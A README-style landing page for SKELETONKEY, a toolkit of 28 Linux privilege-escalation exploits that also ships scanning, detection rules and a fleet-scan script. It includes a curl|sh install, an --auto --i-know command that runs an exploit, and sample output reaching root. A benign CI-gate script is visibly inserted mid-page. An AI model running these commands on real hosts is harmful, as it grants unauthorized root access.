SKELETONKEY

One curated binary. 28 Linux LPE exploits from 2016 → 2026. Detection rules in the box. One command picks the safest one and runs it.

$ curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \
  && skeletonkey --auto --i-know

⚠ Authorized testing only — see ETHICS.md

Why this exists

Most Linux privesc tooling is broken in one of three ways:

SKELETONKEY is one binary, actively maintained, with detection rules for every CVE it bundles — same project for red and blue teams.

Corpus at a glance

28 verified modules
14 🟢 land root by default
14 🟡 primitive + opt-in chain
10y 2016 → 2026 coverage

🟢 Lands root on a vulnerable host

Structural exploits + page-cache writes. No per-kernel offsets needed.

copy_fail copy_fail_gcm dirty_frag_esp dirty_frag_esp6 dirty_frag_rxrpc dirty_pipe dirty_cow pwnkit overlayfs overlayfs_setuid cgroup_release_agent ptrace_traceme sudoedit_editor entrybleed

🟡 Fires kernel primitive · opt-in --full-chain

Default returns EXPLOIT_FAIL honestly. With --full-chain + resolved offsets, runs the shared modprobe_path finisher.

nf_tables nft_set_uaf nft_fwd_dup nft_payload netfilter_xtcompat af_packet af_packet2 af_unix_gc cls_route4 fuse_legacy stackrot sudo_samedit sequoia vmwgfx

Who it's for

🔴 Red team / pentesters

One tested binary. --auto ranks vulnerable modules by safety and runs the safest. Honest scope reporting — never claims root it didn't actually get. No more curating stale PoC repos.

🔵 Blue team / SOC

auditd, Sigma, YARA and Falco rules for every CVE. One command ships SIEM coverage: --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-skeletonkey.rules

🛠 Sysadmins

skeletonkey --scan (no sudo needed) tells you which boxes still need patching. JSON output for CI gates. Fleet-scan tool included. No SaaS, no telemetry.

🎓 CTF / training

Reproducible LPE environment with public CVEs across a 10-year timeline. Each module documents the bug, the trigger, and the fix. Detection rules let you practice both sides.

What it looks like

--auto on a vulnerable Ubuntu 22.04 box:

$ id
uid=1000(kara) gid=1000(kara) groups=1000(kara)

$ skeletonkey --auto --i-know
[*] auto: host=demo kernel=5.15.0-56-generic arch=x86_64
[*] auto: scanning 31 modules for vulnerabilities...
[+] auto: dirty_pipe             VULNERABLE (safety rank 90)
[+] auto: cgroup_release_agent   VULNERABLE (safety rank 98)
[+] auto: pwnkit                 VULNERABLE (safety rank 100)

[*] auto: 3 vulnerable modules found. Safest is 'pwnkit' (rank 100).
[*] auto: launching --exploit pwnkit...

[+] pwnkit: writing gconv-modules cache + payload.so...
[+] pwnkit: execve(pkexec) with NULL argv + crafted envp...
# id
uid=0(root) gid=0(root) groups=0(root)

Safety ranking goes structural escapes → page-cache writes → userspace cred-races → kernel primitives → kernel races. The goal is to never crash a production box looking for root.

The verified-vs-claimed bar

Most public PoC repos hardcode offsets for one kernel build and silently break elsewhere. SKELETONKEY refuses to ship fabricated offsets.

Quickstart commands

# Install (x86_64 / arm64; checksum-verified)
$ curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh

# What's this box vulnerable to?  (no sudo)
$ skeletonkey --scan

# Pick the safest LPE and run it
$ skeletonkey --auto --i-know

# Deploy detection rules (needs sudo to write into /etc/audit/rules.d/)
$ skeletonkey --detect-rules --format=auditd \
    | sudo tee /etc/audit/rules.d/99-skeletonkey.rules

# Fleet scan — many hosts via SSH, aggregated JSON for SIEM
$ ./tools/skeletonkey-fleet-scan.sh --binary skeletonkey \
    --ssh-key ~/.ssh/id_rsa hosts.txt
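The Sysadmins section above promises JSON output for CI gates, and the fleet-scan command aggregates that output across hosts. The script below is an added example of the consuming side of that workflow, not code from the SKELETONKEY project: it parses an aggregated report, subtracts reviewer-accepted risks, ranks modules by how many hosts they still hit, and returns a CI exit status. The JSON layout (host records with a modules array carrying name, status and safety_rank) is an assumption made for illustration, since the page does not document the real schema; the sample report is constructed, with module names taken from the corpus list and hosts, kernels and statuses made up.

```python
"""Added example: a CI / fleet gate over SKELETONKEY scan output.

The JSON layout used here is an ASSUMPTION for illustration; the page does not
document the real --scan / fleet-scan schema, so adapt the field names to what
your binary actually emits.
"""
import json
import sys
from collections import Counter

# Constructed sample report (not real tool output). Module names come from the
# project's corpus; hosts, kernels, statuses and ranks are made up.
SAMPLE_FLEET_REPORT = json.dumps([
    {"host": "web-01", "kernel": "5.15.0-56-generic", "modules": [
        {"name": "pwnkit", "status": "VULNERABLE", "safety_rank": 100},
        {"name": "dirty_pipe", "status": "VULNERABLE", "safety_rank": 90},
        {"name": "nf_tables", "status": "NOT_VULNERABLE"},
    ]},
    {"host": "db-01", "kernel": "6.12.0-1-amd64", "modules": [
        {"name": "pwnkit", "status": "NOT_VULNERABLE"},
        {"name": "dirty_pipe", "status": "NOT_VULNERABLE"},
        {"name": "nf_tables", "status": "NOT_VULNERABLE"},
    ]},
    {"host": "build-03", "kernel": "5.15.0-56-generic", "modules": [
        {"name": "pwnkit", "status": "VULNERABLE", "safety_rank": 100},
        {"name": "cgroup_release_agent", "status": "VULNERABLE", "safety_rank": 98},
    ]},
])


def parse_fleet_report(text):
    """Parse the aggregated JSON and validate the fields the gate relies on."""
    data = json.loads(text)
    if not isinstance(data, list):
        raise ValueError("fleet report must be a JSON array of host records")
    for rec in data:
        for key in ("host", "kernel", "modules"):
            if key not in rec:
                raise ValueError(f"host record missing {key!r}: {rec}")
    return data


def vulnerable_findings(report, accepted_risks=frozenset()):
    """Return (host, module) pairs still flagged VULNERABLE, minus accepted risks.

    accepted_risks holds "host:module" strings a reviewer has signed off on
    (for example a host already scheduled for decommissioning).
    """
    findings = []
    for rec in report:
        for mod in rec["modules"]:
            if mod.get("status") != "VULNERABLE":
                continue
            if f"{rec['host']}:{mod['name']}" in accepted_risks:
                continue
            findings.append((rec["host"], mod["name"]))
    return findings


def hosts_per_module(report, accepted_risks=frozenset()):
    """Count how many hosts each module still hits: the patch-priority list."""
    return Counter(name for _, name in vulnerable_findings(report, accepted_risks))


def gate(text, accepted_risks=frozenset()):
    """Exit status for a CI step: 0 when the fleet is clean, 1 otherwise."""
    report = parse_fleet_report(text)
    findings = vulnerable_findings(report, accepted_risks)
    for host, module in sorted(findings):
        print(f"FAIL {host}: {module} still VULNERABLE")
    for module, n in hosts_per_module(report, accepted_risks).most_common():
        print(f"patch priority: {module} affects {n} host(s)")
    return 1 if findings else 0


if __name__ == "__main__":
    # Run against the constructed sample; in CI, read the fleet-scan output instead.
    sys.exit(gate(SAMPLE_FLEET_REPORT))
```

Wire the real report in by replacing SAMPLE_FLEET_REPORT with the file the fleet-scan script writes, and keep the accepted-risks set in version control so every suppressed finding has a reviewable history.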

Status

v0.5.0 cut 2026-05-17. 28 verified modules build clean on Debian 13 (kernel 6.12) and refuse cleanly on patched hosts; 3 further modules (dirtydecrypt, fragnesia, pack2theroot) are ported from public PoCs but not yet VM-verified. Empirical end-to-end validation on a vulnerable-kernel VM matrix is the next roadmap item; until then, the corpus is best understood as "compiles + detects + structurally correct + honest on failure."

Read the roadmap
How to contribute